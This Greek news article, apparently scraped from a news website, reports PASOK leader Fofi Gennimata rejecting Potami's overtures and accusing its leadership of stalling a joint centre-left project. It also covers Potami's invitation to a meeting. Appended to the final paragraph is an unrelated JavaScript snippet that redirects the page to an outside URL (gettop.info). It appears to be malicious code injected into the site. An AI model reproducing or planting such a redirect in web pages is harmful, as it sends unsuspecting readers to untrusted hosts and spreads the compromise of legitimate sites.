Με… επίθεση απαντά η Γεννηματά στην πρόσκληση Θεοδωράκη

0
3

 

Η Δημοκρατική Συμπαράταξη είναι ανοιχτή στον διάλογο «με όποιον φορέα, κίνηση, ή προσωπικότητα του χώρου το θέλει πραγματικά και αποδέχεται το πλαίσιο που έχει διαμορφωθεί», τόνισε η πρόεδρος του ΠΑΣΟΚ Φώφη Γεννηματά, αναφερόμενη στις διεργασίες στον χώρο της Κεντροαριστεράς και στο ναυάγιο όπου φαίνεται πως καταλήγει η προσπάθεια συνεργασίας με το Ποτάμι.

«Αρκεί να θέτουν την κοινή προσπάθεια, πάνω από επί μέρους σκοπιμότητες, εγωισμούς, μικροσυμφέροντα», συμπλήρωσε η κ. Γεννηματά, κατά την τοποθέτησή της στην κοινή συνεδρίαση ΠΑΣΟΚ, ΔΗΜΑΡ και Κινήσεων Πολιτών, κάνοντας λόγο για «ισχυρή, αυτόνομη Κεντροαριστερά».

«Επί μήνες αντιμετωπίσαμε κωλυσιεργία, διγλωσσία και ανοιχτή αμφισβήτηση από την ηγεσία του Ποταμιού»

Η κα Γεννηματά εξαπέλυσε ευθεία επίθεση κατά του Ποταμιού καταλογίζoντας στην ηγεσία του κόμματος της Σεβαστουπόλεως ότι δεν θέλει να προχωρήσει το εγχείρημα της δημιουργίας ενός νέου πολιτικού και κοινωνικού ρεύματος των δυνάμεων που ανήκουν στον χώρο της ευρωπαϊκής σοσιαλδημοκρατίας, του ριζοσπαστικού προοδευτικού κέντρου, της ανανεωτικής Αριστεράς, της πολιτικής οικολογίας.

«Δυστυχώς επί μήνες αντιμετωπίσαμε κωλυσιεργία, διγλωσσία και μια ανοιχτή αμφισβήτηση από την ηγεσία του Ποταμίου, με συνεχείς παρεμβάσεις και διαρροές μέσω των ΜΜΕ», είπε και συμπλήρωσε: «Και το κυριότερο στην “ανοιχτή επιστολή” τους, ανατρέπουν τον βασικό λόγο της δημιουργίας της νέας παράταξης, εγκαταλείποντας την βασική στρατηγική επιλογή του αυτόνομου πολιτικού πόλου, της ιδεολογικής και πολιτικής οριοθέτησης τόσο απέναντι στον ΣΥΡΙΖΑ, όσο και απέναντι στη Ν.Δ.».

Όπως σημείωσε η κα Γεννηματά «νέος ενιαίος φορέας της Κεντροαριστεράς και παράρτημα ή συμπλήρωμα της Ν.Δ., είναι παντελώς ασύμβατες έννοιες. Όπως και υπενθυμίζω ότι ανάλογα αρνηθήκαμε και την πρόταση του κ. Γ. Παπανδρέου για να συμπεριλάβουμε και τον ΣΥΡΙΖΑ στον διάλογο για την ανασύσταση της Κεντροαριστεράς».

Πάντως, η επικεφαλής της Δημοκρατικής Συμπαράταξης επέμεινε ότι «το εγχείρημα της Κεντροαριστεράς πρέπει να μείνει ζωντανό», διευκρινίζοντας ότι «προϋποθέτει πίστη στους στόχους του και μπέσα μεταξύ όσων συμμετέχουν».

Νωρίτερα σε ανακοίνωση του το Ποτάμι ανέφερε ότι «το Πολιτικό Συμβούλιο του Ποταμιού απευθύνει πρόσκληση για συνάντηση με τους εκπροσώπους του ΠΑΣΟΚ, όποια από τις επόμενες μέρες επιλέξουν, διαβίβασε ο γραμματέας Οργανωτικού του Κινήματος Παντελής Αβραμίδης, στον γραμματέα του ΠΑΣΟΚ, Στέφανο Ξεκαλάκη».

«Στόχος είναι να ξεκινήσουν οι διαδικασίες για ένα «νέο Κίνημα», πριν από το τέλος Σεπτεμβρίου, με κοινή συνέντευξη Τύπου της Φώφης Γεννηματά και του Σταύρου Θεοδωράκη», προστίθεται στην ανακοίνωση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here